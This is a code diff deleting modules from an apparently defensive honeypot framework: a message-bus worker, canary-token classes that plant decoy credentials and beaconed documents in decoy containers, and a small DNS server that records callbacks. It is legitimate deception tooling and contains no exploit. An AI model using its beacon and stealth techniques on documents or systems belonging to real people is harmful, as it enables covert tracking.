||||
queue.put_nowait(data)
|
||||
return
|
||||
except asyncio.QueueFull:
|
||||
try:
|
||||
queue.get_nowait()
|
||||
log.warning("bus.server: subscriber queue full, dropped event topic=%s", topic)
|
||||
except asyncio.QueueEmpty:
|
||||
return
|
||||
@@ -1,121 +0,0 @@
|
||||
"""``decnet bus`` worker entrypoint.
|
||||
|
||||
Starts a :class:`~decnet.bus.unix_server.BusServer` on the configured UNIX
|
||||
socket and serves forever, emitting a ``system.bus.health`` heartbeat on
|
||||
its own bus every :data:`HEARTBEAT_INTERVAL_SEC` seconds so liveness-aware
|
||||
consumers (dashboards, watchdogs) can tell the bus is up without polling
|
||||
the filesystem.
|
||||
|
||||
Cross-host federation is **out of scope** for the MVP; each host runs its
|
||||
own bus independently. See DEBT-029 for the deferred ``--bridge-tcp``
|
||||
mode that would proxy the socket over the swarm mTLS channel.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
import pathlib
|
||||
import signal
|
||||
import time
|
||||
|
||||
from decnet.bus import topics
|
||||
from decnet.bus.unix_server import BusServer
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.worker")
|
||||
|
||||
HEARTBEAT_INTERVAL_SEC = 10
|
||||
|
||||
|
||||
async def bus_worker(
|
||||
socket_path: str | pathlib.Path,
|
||||
*,
|
||||
group: str | None = "decnet",
|
||||
heartbeat_interval: int = HEARTBEAT_INTERVAL_SEC,
|
||||
) -> None:
|
||||
"""Run the bus server until cancelled or SIGTERM/SIGINT is received.
|
||||
|
||||
The parent directory of *socket_path* must already exist (systemd's
|
||||
``RuntimeDirectory=decnet`` handles this in prod; dev code is expected
|
||||
to ``mkdir`` first). This function does not create it implicitly
|
||||
because the right choice of perms/owner depends on the deployment
|
||||
context.
|
||||
"""
|
||||
path = pathlib.Path(socket_path)
|
||||
_ensure_parent(path)
|
||||
|
||||
server = BusServer(path, group=group)
|
||||
await server.start()
|
||||
log.info("bus.worker: pid=%d socket=%s", os.getpid(), path)
|
||||
|
||||
stop_event = asyncio.Event()
|
||||
_install_signal_handlers(stop_event)
|
||||
|
||||
heartbeat_task = asyncio.create_task(_heartbeat_loop(server, heartbeat_interval))
|
||||
serve_task = asyncio.create_task(server.serve_forever())
|
||||
|
||||
try:
|
||||
await stop_event.wait()
|
||||
log.info("bus.worker: shutdown signal received")
|
||||
finally:
|
||||
heartbeat_task.cancel()
|
||||
serve_task.cancel()
|
||||
for task in (heartbeat_task, serve_task):
|
||||
try:
|
||||
await task
|
||||
except (asyncio.CancelledError, Exception): # noqa: BLE001 - draining shutdown
|
||||
pass
|
||||
await server.close()
|
||||
log.info("bus.worker: stopped")
|
||||
|
||||
|
||||
async def _heartbeat_loop(server: BusServer, interval: int) -> None:
|
||||
"""Publish ``system.bus.health`` on the server's own fan-out."""
|
||||
started_at = time.time()
|
||||
while True:
|
||||
try:
|
||||
await server.publish(
|
||||
topics.system(topics.SYSTEM_BUS_HEALTH),
|
||||
{
|
||||
"pid": os.getpid(),
|
||||
"uptime_sec": round(time.time() - started_at, 3),
|
||||
"ts": time.time(),
|
||||
},
|
||||
event_type=topics.SYSTEM_BUS_HEALTH,
|
||||
)
|
||||
except Exception: # pragma: no cover - heartbeat must never kill the worker
|
||||
log.exception("bus.worker: heartbeat publish failed")
|
||||
await asyncio.sleep(interval)
|
||||
|
||||
|
||||
def _install_signal_handlers(stop_event: asyncio.Event) -> None:
|
||||
loop = asyncio.get_running_loop()
|
||||
for sig in (signal.SIGTERM, signal.SIGINT):
|
||||
try:
|
||||
loop.add_signal_handler(sig, stop_event.set)
|
||||
except (NotImplementedError, RuntimeError):
|
||||
# add_signal_handler is not supported on Windows / in some
|
||||
# test harnesses where the loop is running in a non-main thread.
|
||||
# The worker still exits via KeyboardInterrupt bubbling up.
|
||||
pass
|
||||
|
||||
|
||||
def _ensure_parent(path: pathlib.Path) -> None:
|
||||
parent = path.parent
|
||||
if parent.exists():
|
||||
return
|
||||
# Dev-box convenience: if the parent is the user's ``~/.decnet`` dir,
|
||||
# create it. We do not auto-mkdir ``/run/decnet`` — that's systemd's job
|
||||
# and silently creating it as the wrong user would cause permission
|
||||
# confusion later.
|
||||
home_prefix = pathlib.Path.home() / ".decnet"
|
||||
try:
|
||||
parent.relative_to(home_prefix.parent)
|
||||
except ValueError:
|
||||
raise FileNotFoundError(
|
||||
f"bus socket parent {parent} does not exist; create it first"
|
||||
)
|
||||
parent.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
|
||||
__all__ = ["bus_worker", "HEARTBEAT_INTERVAL_SEC"]
|
||||
@@ -1,37 +0,0 @@
|
||||
"""Canary tokens — decoy artifacts planted in decky filesystems.
|
||||
|
||||
Public surface is exported here so callers can ``from decnet.canary
|
||||
import CanaryArtifact, get_generator, get_instrumenter`` without
|
||||
knowing the submodule layout. Concrete generators / instrumenters
|
||||
live under :mod:`decnet.canary.generators` and
|
||||
:mod:`decnet.canary.instrumenters` respectively; the factory keeps
|
||||
import-time cost down by deferring those imports until first use
|
||||
(same pattern as :mod:`decnet.intel.factory`).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryGenerator,
|
||||
CanaryInstrumenter,
|
||||
)
|
||||
from decnet.canary.factory import (
|
||||
KNOWN_GENERATORS,
|
||||
KNOWN_INSTRUMENTERS,
|
||||
get_generator,
|
||||
get_instrumenter,
|
||||
pick_instrumenter_for_mime,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
"CanaryArtifact",
|
||||
"CanaryContext",
|
||||
"CanaryGenerator",
|
||||
"CanaryInstrumenter",
|
||||
"KNOWN_GENERATORS",
|
||||
"KNOWN_INSTRUMENTERS",
|
||||
"get_generator",
|
||||
"get_instrumenter",
|
||||
"pick_instrumenter_for_mime",
|
||||
]
|
||||
@@ -1,145 +0,0 @@
|
||||
"""Canary generator / instrumenter ABCs and the artifact dataclass.
|
||||
|
||||
Two flavors of producer share the same return shape:
|
||||
|
||||
* :class:`CanaryGenerator` synthesises a fake artifact from scratch
|
||||
(e.g. a plausible ``~/.aws/credentials`` block, a ``.git/config``
|
||||
pointing at an attacker-bait remote URL). Operators don't supply
|
||||
any input.
|
||||
|
||||
* :class:`CanaryInstrumenter` mutates an operator-uploaded blob to
|
||||
embed the callback (HTTP slug + DNS host). The original blob bytes
|
||||
are passed in; the instrumenter returns the mutated version.
|
||||
|
||||
Both return a :class:`CanaryArtifact` — the planter doesn't care
|
||||
which path produced it. Same dataclass keeps the planter's
|
||||
docker-exec injector trivial.
|
||||
|
||||
ABCs intentionally do not include I/O — generators and instrumenters
|
||||
are pure functions of (slug, host, blob?). All filesystem work
|
||||
happens in :mod:`decnet.canary.planter` and :mod:`decnet.canary.storage`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Optional
|
||||
|
||||
|
||||
@dataclass
|
||||
class CanaryContext:
|
||||
"""Inputs every generator/instrumenter needs to embed a working callback.
|
||||
|
||||
``callback_token`` is the unique slug; it appears verbatim in HTTP
|
||||
URLs (``https://<host>/c/<callback_token>``) and as the leftmost
|
||||
DNS label (``<callback_token>.canary.<dns_zone>``) so a single
|
||||
slug resolves to a single :class:`CanaryToken` row regardless of
|
||||
which path the attacker tripped.
|
||||
|
||||
``http_base`` and ``dns_zone`` come from the canary worker's
|
||||
public-facing config (``DECNET_CANARY_HTTP_BASE``,
|
||||
``DECNET_CANARY_DNS_ZONE``). When DNS isn't deployed,
|
||||
``dns_zone`` is empty and instrumenters that only have a DNS
|
||||
surface (e.g. an artifact whose only realistic embed point is a
|
||||
hostname) raise.
|
||||
"""
|
||||
|
||||
callback_token: str
|
||||
http_base: str # e.g. "https://canary.example.test" — no trailing slash
|
||||
dns_zone: str = "" # e.g. "canary.example.test"; "" disables DNS embeds
|
||||
persona: str = "linux" # "linux" | "windows" — drives default username, path style
|
||||
|
||||
|
||||
@dataclass
|
||||
class CanaryArtifact:
|
||||
"""Bytes-and-placement bundle produced by a generator/instrumenter."""
|
||||
|
||||
path: str
|
||||
"""Absolute path inside the target container."""
|
||||
|
||||
content: bytes
|
||||
"""Final bytes that hit the decky filesystem.
|
||||
|
||||
Always raw bytes — the planter base64-encodes for the wire so
|
||||
binary blobs (DOCX/PNG/PDF) survive ``docker exec sh -c`` safely.
|
||||
"""
|
||||
|
||||
mode: int = 0o600
|
||||
"""Unix file mode. Defaults to ``0600`` because most realistic
|
||||
canary placements (``~/.aws/credentials``, ``.env``, ``id_rsa``)
|
||||
are operator-only. Honeydocs in user docs folders should pass
|
||||
``0o644``.
|
||||
"""
|
||||
|
||||
mtime_offset: int = 0
|
||||
"""Seconds relative to *now* for the planted file's mtime.
|
||||
|
||||
Negative values backdate the file so it doesn't look like it
|
||||
appeared the moment the decky was deployed. ``-86400 * 90`` (90
|
||||
days ago) is a common choice for ``honeydoc`` artifacts; ``0``
|
||||
means "stamp it now," which is fine for ``aws_creds``-like files
|
||||
that would plausibly be touched recently.
|
||||
"""
|
||||
|
||||
instrumenter: Optional[str] = None
|
||||
"""Identifier of the instrumenter that produced this artifact (for
|
||||
upload-driven tokens). Mirrored into ``CanaryToken.instrumenter``.
|
||||
Mutually exclusive with :attr:`generator`.
|
||||
"""
|
||||
|
||||
generator: Optional[str] = None
|
||||
"""Identifier of the generator that produced this artifact (for
|
||||
synthesised tokens). Mirrored into ``CanaryToken.generator``.
|
||||
Mutually exclusive with :attr:`instrumenter`.
|
||||
"""
|
||||
|
||||
notes: list[str] = field(default_factory=list)
|
||||
"""Human-readable notes about the embedding (e.g. "DOCX: injected
|
||||
1×1 remote image at relsId rId99"). Surfaced in the API
|
||||
``preview`` response so the operator sees what we did before
|
||||
planting. Never leaked to the attacker-facing surface.
|
||||
"""
|
||||
|
||||
|
||||
class CanaryGenerator(ABC):
|
||||
"""Produces a fake artifact from scratch."""
|
||||
|
||||
name: str #: short tag — matches ``CanaryToken.generator``
|
||||
|
||||
@abstractmethod
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
"""Synthesise the artifact.
|
||||
|
||||
MUST NOT do I/O. MUST be deterministic for the same
|
||||
``(callback_token, http_base, dns_zone, persona)`` so re-seeding
|
||||
from :attr:`CanaryToken.secret_seed` produces byte-identical
|
||||
output and the planter is naturally idempotent.
|
||||
"""
|
||||
|
||||
|
||||
class CanaryInstrumenter(ABC):
|
||||
"""Mutates an operator-uploaded blob to embed a callback."""
|
||||
|
||||
name: str #: short tag — matches ``CanaryToken.instrumenter``
|
||||
|
||||
#: MIME prefixes this instrumenter handles. The factory uses these
|
||||
#: to dispatch by sniffed content-type. Sub-string match against
|
||||
#: the prefix list (e.g. ``("application/pdf",)`` or
|
||||
#: ``("text/",)``).
|
||||
mime_prefixes: tuple[str, ...] = ()
|
||||
|
||||
@abstractmethod
|
||||
def instrument(
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
"""Return the mutated bytes with the callback embedded.
|
||||
|
||||
MUST raise :class:`InstrumenterRejectedError` when the blob
|
||||
can't be safely mutated (corrupt zip, encrypted PDF, etc.) so
|
||||
the API can surface a 400 with the specific reason rather than
|
||||
silently shipping the original bytes.
|
||||
"""
|
||||
|
||||
|
||||
class InstrumenterRejectedError(ValueError):
|
||||
"""Raised when an instrumenter can't safely mutate the input."""
|
||||
@@ -1,181 +0,0 @@
|
||||
"""Realism contract adapter for canary generators.
|
||||
|
||||
Stage 7 of the realism migration. The orchestrator's planner picks a
|
||||
``canary_*`` :class:`~decnet.realism.taxonomy.ContentClass` 1–3% of
|
||||
the time on file ticks; this module turns that pick into a
|
||||
:class:`~decnet.canary.base.CanaryArtifact` (bytes the SSH driver
|
||||
plants) plus a persisted :class:`~decnet.web.db.models.CanaryToken`
|
||||
row so the canary worker recognises the slug when an attacker trips
|
||||
it.
|
||||
|
||||
What this is NOT: it doesn't pick *when* canaries fire — that's the
|
||||
realism planner's job. It doesn't decide *where* on the filesystem
|
||||
the canary lands beyond what realism naming + persona conventions
|
||||
already produce. It's a thin bytes-and-row factory bolted onto the
|
||||
realism contract.
|
||||
|
||||
Stealth (per ``feedback_stealth.md``): we never leak the
|
||||
``DECNET`` literal into anything that survives to the planted file.
|
||||
The underlying generators are already stealth-clean; this wrapper
|
||||
must not undo that.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import secrets as _secrets
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Optional
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||
from decnet.canary.factory import get_generator
|
||||
from decnet.logging import get_logger
|
||||
from decnet.realism.personas import login_for
|
||||
from decnet.realism.taxonomy import ContentClass, Plan
|
||||
|
||||
log = get_logger("canary.cultivator")
|
||||
|
||||
|
||||
# realism content_class → canary generator name. Mirrors
|
||||
# :data:`decnet.canary.factory.KNOWN_GENERATORS`.
|
||||
_CLASS_TO_GENERATOR: dict[ContentClass, str] = {
|
||||
ContentClass.CANARY_AWS_CREDS: "aws_creds",
|
||||
ContentClass.CANARY_ENV_FILE: "env_file",
|
||||
ContentClass.CANARY_GIT_CONFIG: "git_config",
|
||||
ContentClass.CANARY_SSH_KEY: "ssh_key",
|
||||
ContentClass.CANARY_HONEYDOC: "honeydoc",
|
||||
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
||||
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
||||
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
||||
}
|
||||
|
||||
|
||||
# Generator → CanaryKind. The trip surface (HTTP slug callback / DNS
|
||||
# resolution / passive bait) determines how the canary worker matches
|
||||
# an attacker callback to this token. Aligned with
|
||||
# :data:`decnet.web.db.models.canary.CanaryKind`.
|
||||
_GENERATOR_TO_KIND: dict[str, str] = {
|
||||
"aws_creds": "aws_passive", # no embedded callback; passive bait
|
||||
"env_file": "http",
|
||||
"git_config": "http",
|
||||
"honeydoc": "http",
|
||||
"honeydoc_docx": "http",
|
||||
"honeydoc_pdf": "http",
|
||||
"ssh_key": "dns", # trip is DNS resolution of host comment
|
||||
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
||||
}
|
||||
|
||||
|
||||
# Path conventions per generator. The realism planner doesn't know
|
||||
# about decoy-realistic credential locations (``~/.aws/credentials``,
|
||||
# ``~/.git/config``); we map them per-class here so the planted
|
||||
# artifact lands somewhere an attacker would actually look.
|
||||
_DEFAULT_PATH: dict[ContentClass, str] = {
|
||||
ContentClass.CANARY_AWS_CREDS: "/home/{persona}/.aws/credentials",
|
||||
ContentClass.CANARY_ENV_FILE: "/home/{persona}/app/.env",
|
||||
ContentClass.CANARY_GIT_CONFIG: "/home/{persona}/.git/config",
|
||||
ContentClass.CANARY_SSH_KEY: "/home/{persona}/.ssh/id_rsa",
|
||||
ContentClass.CANARY_HONEYDOC: "/home/{persona}/Documents/notes.html",
|
||||
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
||||
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
||||
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
||||
}
|
||||
|
||||
|
||||
def _path_for(plan: Plan) -> str:
|
||||
"""Produce the canary placement path for *plan*.
|
||||
|
||||
The realism planner already filled in ``plan.target_path`` from
|
||||
the namer, but canary placements have stronger conventions
|
||||
(``~/.aws/credentials``, ``~/.ssh/id_rsa``) than the realism
|
||||
namer's vocabulary. When :data:`_DEFAULT_PATH` has an entry,
|
||||
that wins.
|
||||
"""
|
||||
template = _DEFAULT_PATH.get(plan.content_class)
|
||||
if template is None:
|
||||
return plan.target_path
|
||||
return template.format(persona=login_for(plan.persona))
|
||||
|
||||
|
||||
def _new_callback_token() -> str:
|
||||
"""16 url-safe bytes — same shape canary slug fields use elsewhere."""
|
||||
return _secrets.token_urlsafe(16)
|
||||
|
||||
|
||||
async def cultivate(
|
||||
plan: Plan,
|
||||
repo: Any,
|
||||
*,
|
||||
http_base: Optional[str] = None,
|
||||
dns_zone: Optional[str] = None,
|
||||
created_by: str = "system",
|
||||
) -> CanaryArtifact:
|
||||
"""Realism-driven canary plant.
|
||||
|
||||
Build a :class:`CanaryContext`, ask the right generator for bytes,
|
||||
persist a ``canary_tokens`` row so the canary worker can attribute
|
||||
callbacks to this token, and return the artifact for the SSH
|
||||
driver to plant.
|
||||
|
||||
*http_base* and *dns_zone* default to ``DECNET_CANARY_HTTP_BASE``
|
||||
and ``DECNET_CANARY_DNS_ZONE`` env vars respectively — same
|
||||
pattern the canary worker uses. When both are empty, generators
|
||||
that need a callback host (``ssh_key`` DNS, ``mysql_dump``)
|
||||
raise; the planner's caller logs and falls back to a non-canary
|
||||
plan.
|
||||
"""
|
||||
if not plan.content_class.is_canary():
|
||||
raise ValueError(
|
||||
f"cultivate() called with non-canary content_class="
|
||||
f"{plan.content_class!r}"
|
||||
)
|
||||
gen_name = _CLASS_TO_GENERATOR.get(plan.content_class)
|
||||
if gen_name is None:
|
||||
raise KeyError(
|
||||
f"no canary generator mapped for content_class="
|
||||
f"{plan.content_class!r}"
|
||||
)
|
||||
|
||||
callback_token = _new_callback_token()
|
||||
ctx = CanaryContext(
|
||||
callback_token=callback_token,
|
||||
http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
|
||||
dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
|
||||
persona="linux", # all our deckies are POSIX in MVP
|
||||
)
|
||||
generator = get_generator(gen_name)
|
||||
artifact = generator.generate(ctx)
|
||||
|
||||
# The generator returns ``path=""`` (planter fills it normally).
|
||||
# We have a realism-derived path on hand; stuff it in for the SSH
|
||||
# driver's plant_file call AND the canary_tokens row.
|
||||
placement_path = _path_for(plan)
|
||||
|
||||
# Persist the token row before planting so the canary worker can
|
||||
# attribute a callback if the artifact trips during the plant
|
||||
# itself (improbable but possible — DOCX viewers can preview
|
||||
# autoplay-style).
|
||||
await repo.create_canary_token({
|
||||
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
||||
"decky_name": plan.decky_name,
|
||||
"instrumenter": None,
|
||||
"generator": gen_name,
|
||||
"placement_path": placement_path,
|
||||
"callback_token": callback_token,
|
||||
"secret_seed": callback_token, # deterministic re-seed compatible
|
||||
"placed_at": datetime.now(timezone.utc),
|
||||
"created_by": created_by,
|
||||
"state": "planted",
|
||||
})
|
||||
|
||||
# Carry the placement_path on the artifact so the orchestrator's
|
||||
# plant_file call uses it. We don't mutate the generator's
|
||||
# original — copy with the new path.
|
||||
return CanaryArtifact(
|
||||
path=placement_path,
|
||||
content=artifact.content,
|
||||
mode=artifact.mode,
|
||||
mtime_offset=artifact.mtime_offset,
|
||||
instrumenter=artifact.instrumenter,
|
||||
generator=artifact.generator,
|
||||
notes=list(artifact.notes),
|
||||
)
|
||||
@@ -1,207 +0,0 @@
|
||||
"""Minimal authoritative DNS server for canary tokens (stdlib only).
|
||||
|
||||
We don't need a full resolver — only enough to:
|
||||
|
||||
1. Decode an inbound query's qname.
|
||||
2. If the qname matches ``<slug>.<canary_zone>``, log the callback,
|
||||
publish ``canary.<token_id>.triggered`` on the bus, and return a
|
||||
plausible A record (any RFC-5737 reserved address would do; we
|
||||
use 192.0.2.1) so the attacker's resolver doesn't loop on
|
||||
NXDOMAIN.
|
||||
3. For unknown qnames return NXDOMAIN.
|
||||
|
||||
DNS-over-UDP wire format is well-trodden: 12-byte header + name
|
||||
labels + qtype + qclass. We implement just the bits we need.
|
||||
|
||||
This module deliberately avoids the ``dnslib`` PyPI package so the
|
||||
canary worker has no extra dependency surface. If we ever need
|
||||
EDNS0, DNSSEC, or other niceties we'll swap to dnslib then.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import struct
|
||||
from dataclasses import dataclass
|
||||
from typing import Awaitable, Callable, Optional, Tuple
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class DNSQuery:
|
||||
"""Decoded query — only the bits the canary worker cares about."""
|
||||
|
||||
txid: int
|
||||
qname: str # lowercase, no trailing dot
|
||||
qtype: int
|
||||
qclass: int
|
||||
flags: int
|
||||
|
||||
|
||||
def _decode_name(buf: bytes, offset: int) -> Tuple[str, int]:
|
||||
"""Return ``(qname_lowercase_no_dot, bytes_consumed)``.
|
||||
|
||||
Supports compressed pointers (RFC 1035 §4.1.4). Doesn't recurse —
|
||||
we walk the pointer chain iteratively with a hop cap to avoid
|
||||
pointer-loop DoS.
|
||||
"""
|
||||
labels: list[str] = []
|
||||
pos = offset
|
||||
consumed = 0
|
||||
jumped = False
|
||||
hops = 0
|
||||
while True:
|
||||
if pos >= len(buf):
|
||||
raise ValueError("truncated DNS name")
|
||||
length = buf[pos]
|
||||
if length == 0:
|
||||
pos += 1
|
||||
if not jumped:
|
||||
consumed = pos - offset
|
||||
break
|
||||
if (length & 0xC0) == 0xC0:
|
||||
# Compression pointer.
|
||||
if pos + 1 >= len(buf):
|
||||
raise ValueError("truncated DNS pointer")
|
||||
ptr = ((length & 0x3F) << 8) | buf[pos + 1]
|
||||
if not jumped:
|
||||
consumed = (pos + 2) - offset
|
||||
pos = ptr
|
||||
jumped = True
|
||||
hops += 1
|
||||
if hops > 10:
|
||||
raise ValueError("DNS pointer loop")
|
||||
continue
|
||||
pos += 1
|
||||
if pos + length > len(buf):
|
||||
raise ValueError("truncated DNS label")
|
||||
labels.append(buf[pos:pos + length].decode("ascii", "replace"))
|
||||
pos += length
|
||||
return ".".join(labels).lower(), consumed
|
||||
|
||||
|
||||
def parse_query(packet: bytes) -> DNSQuery:
|
||||
"""Parse the (single) question of a DNS query packet."""
|
||||
if len(packet) < 12:
|
||||
raise ValueError("DNS packet too short")
|
||||
txid, flags, qdcount, _ancount, _nscount, _arcount = struct.unpack(
|
||||
"!HHHHHH", packet[:12]
|
||||
)
|
||||
if qdcount != 1:
|
||||
raise ValueError(f"expected 1 question, got {qdcount}")
|
||||
qname, consumed = _decode_name(packet, 12)
|
||||
pos = 12 + consumed
|
||||
if pos + 4 > len(packet):
|
||||
raise ValueError("truncated DNS qtype/qclass")
|
||||
qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
|
||||
return DNSQuery(
|
||||
txid=txid, qname=qname, qtype=qtype, qclass=qclass, flags=flags,
|
||||
)
|
||||
|
||||
|
||||
def _encode_name(name: str) -> bytes:
|
||||
out = bytearray()
|
||||
for label in name.split("."):
|
||||
if not label:
|
||||
continue
|
||||
b = label.encode("ascii", "replace")
|
||||
out.append(len(b))
|
||||
out.extend(b)
|
||||
out.append(0)
|
||||
return bytes(out)
|
||||
|
||||
|
||||
def _build_response(
|
||||
query: DNSQuery,
|
||||
*,
|
||||
rcode: int = 0,
|
||||
answer_ip: Optional[str] = None,
|
||||
) -> bytes:
|
||||
"""Encode a DNS response packet.
|
||||
|
||||
*rcode* 0 = NOERROR, 3 = NXDOMAIN. When *answer_ip* is supplied
|
||||
and the query was for an A record we include exactly one answer
|
||||
(TTL 60, class IN).
|
||||
"""
|
||||
qd_count = 1
|
||||
an_count = 1 if (answer_ip and query.qtype == 1 and rcode == 0) else 0
|
||||
flags = 0x8400 | rcode # response + authoritative + RA bit clear + rcode
|
||||
header = struct.pack(
|
||||
"!HHHHHH", query.txid, flags, qd_count, an_count, 0, 0,
|
||||
)
|
||||
qname_bytes = _encode_name(query.qname)
|
||||
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
|
||||
|
||||
answer = b""
|
||||
if an_count:
|
||||
# Use a name pointer back to the question (offset 12).
|
||||
ptr = struct.pack("!H", 0xC000 | 12)
|
||||
rdata = bytes(int(o) for o in answer_ip.split("."))
|
||||
answer = ptr + struct.pack("!HHIH", 1, 1, 60, 4) + rdata
|
||||
|
||||
return header + question + answer
|
||||
|
||||
|
||||
# Hook signature: receives the matched slug + the query; returns
|
||||
# nothing. The worker uses it to persist a CanaryTrigger row and
|
||||
# publish the bus event.
|
||||
TriggerHook = Callable[[str, DNSQuery, str], Awaitable[None]]
|
||||
|
||||
|
||||
class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
||||
"""asyncio UDP server endpoint for canary DNS callbacks.
|
||||
|
||||
Constructor takes the canary zone (``"canary.example.test"``) and
|
||||
a coroutine called when a query matches ``<slug>.<zone>``. The
|
||||
hook runs in the event loop's task; we don't block the receive
|
||||
path on it.
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
zone: str,
|
||||
hook: TriggerHook,
|
||||
*,
|
||||
answer_ip: str = "192.0.2.1",
|
||||
) -> None:
|
||||
# Normalise: lowercase, no leading/trailing dot.
|
||||
self._zone = zone.lower().strip(".")
|
||||
self._suffix = "." + self._zone if self._zone else ""
|
||||
self._hook = hook
|
||||
self._answer_ip = answer_ip
|
||||
self._transport: Optional[asyncio.DatagramTransport] = None
|
||||
|
||||
def connection_made(self, transport) -> None: # type: ignore[override]
|
||||
self._transport = transport # type: ignore[assignment]
|
||||
|
||||
def datagram_received( # type: ignore[override]
|
||||
self, data: bytes, addr: Tuple[str, int],
|
||||
) -> None:
|
||||
try:
|
||||
query = parse_query(data)
|
||||
except ValueError:
|
||||
# Malformed query — drop silently. Returning a FORMERR
|
||||
# would tip off the attacker that *something* is listening
|
||||
# on this port; the stealth posture (feedback_stealth)
|
||||
# prefers radio silence on parse errors.
|
||||
return
|
||||
slug = self._slug_for(query.qname)
|
||||
if slug is None:
|
||||
# Unknown name — NXDOMAIN.
|
||||
self._send(addr, _build_response(query, rcode=3))
|
||||
return
|
||||
# Known name — answer with our sinkhole IP, then fire the hook.
|
||||
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
|
||||
asyncio.create_task(self._hook(slug, query, addr[0]))
|
||||
|
||||
def _slug_for(self, qname: str) -> Optional[str]:
|
||||
if not self._zone or not qname.endswith(self._suffix):
|
||||
return None
|
||||
slug = qname[: -len(self._suffix)]
|
||||
# Single-label slug only; multi-label means the attacker is
|
||||
# querying a sub-resource we don't model.
|
||||
if not slug or "." in slug:
|
||||
return None
|
||||
return slug
|
||||
|
||||
def _send(self, addr: Tuple[str, int], packet: bytes) -> None:
|
||||
if self._transport is not None:
|
||||
self._transport.sendto(packet, addr)
|
||||
@@ -1,141 +0,0 @@
|
||||
"""Generator and instrumenter factories.
|
||||
|
||||
Same lazy-import pattern as :mod:`decnet.intel.factory` — concrete
|
||||
implementations stay un-imported until first use so importing
|
||||
:mod:`decnet.canary` from a CLI subcommand doesn't drag in
|
||||
``pikepdf`` / ``python-docx`` / ``Pillow`` for callers that only
|
||||
need the model layer.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Tuple
|
||||
|
||||
from decnet.canary.base import CanaryGenerator, CanaryInstrumenter
|
||||
|
||||
KNOWN_GENERATORS: Tuple[str, ...] = (
|
||||
"git_config",
|
||||
"env_file",
|
||||
"ssh_key",
|
||||
"aws_creds",
|
||||
"honeydoc",
|
||||
"honeydoc_docx",
|
||||
"honeydoc_pdf",
|
||||
"mysql_dump",
|
||||
)
|
||||
|
||||
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
||||
"docx",
|
||||
"xlsx",
|
||||
"pdf",
|
||||
"html",
|
||||
"image",
|
||||
"plain",
|
||||
"passthrough",
|
||||
)
|
||||
|
||||
|
||||
def get_generator(name: str) -> CanaryGenerator:
|
||||
"""Return the generator registered under ``name``.
|
||||
|
||||
Raises :class:`ValueError` for unknown names so a typo in the API
|
||||
request surfaces as a 400 rather than silently producing nothing.
|
||||
"""
|
||||
if name == "git_config":
|
||||
from decnet.canary.generators.git_config import GitConfigGenerator
|
||||
return GitConfigGenerator()
|
||||
if name == "env_file":
|
||||
from decnet.canary.generators.env_file import EnvFileGenerator
|
||||
return EnvFileGenerator()
|
||||
if name == "ssh_key":
|
||||
from decnet.canary.generators.ssh_key import SSHKeyGenerator
|
||||
return SSHKeyGenerator()
|
||||
if name == "aws_creds":
|
||||
from decnet.canary.generators.aws_creds import AWSCredsGenerator
|
||||
return AWSCredsGenerator()
|
||||
if name == "honeydoc":
|
||||
from decnet.canary.generators.honeydoc import HoneydocGenerator
|
||||
return HoneydocGenerator()
|
||||
if name == "honeydoc_docx":
|
||||
from decnet.canary.generators.honeydoc_docx import HoneydocDocxGenerator
|
||||
return HoneydocDocxGenerator()
|
||||
if name == "honeydoc_pdf":
|
||||
from decnet.canary.generators.honeydoc_pdf import HoneydocPdfGenerator
|
||||
return HoneydocPdfGenerator()
|
||||
if name == "mysql_dump":
|
||||
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
||||
return MySQLDumpGenerator()
|
||||
raise ValueError(
|
||||
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
||||
)
|
||||
|
||||
|
||||
def get_instrumenter(name: str) -> CanaryInstrumenter:
|
||||
"""Return the instrumenter registered under ``name``."""
|
||||
if name == "docx":
|
||||
from decnet.canary.instrumenters.docx import DocxInstrumenter
|
||||
return DocxInstrumenter()
|
||||
if name == "xlsx":
|
||||
from decnet.canary.instrumenters.xlsx import XlsxInstrumenter
|
||||
return XlsxInstrumenter()
|
||||
if name == "pdf":
|
||||
from decnet.canary.instrumenters.pdf import PdfInstrumenter
|
||||
return PdfInstrumenter()
|
||||
if name == "html":
|
||||
from decnet.canary.instrumenters.html import HtmlInstrumenter
|
||||
return HtmlInstrumenter()
|
||||
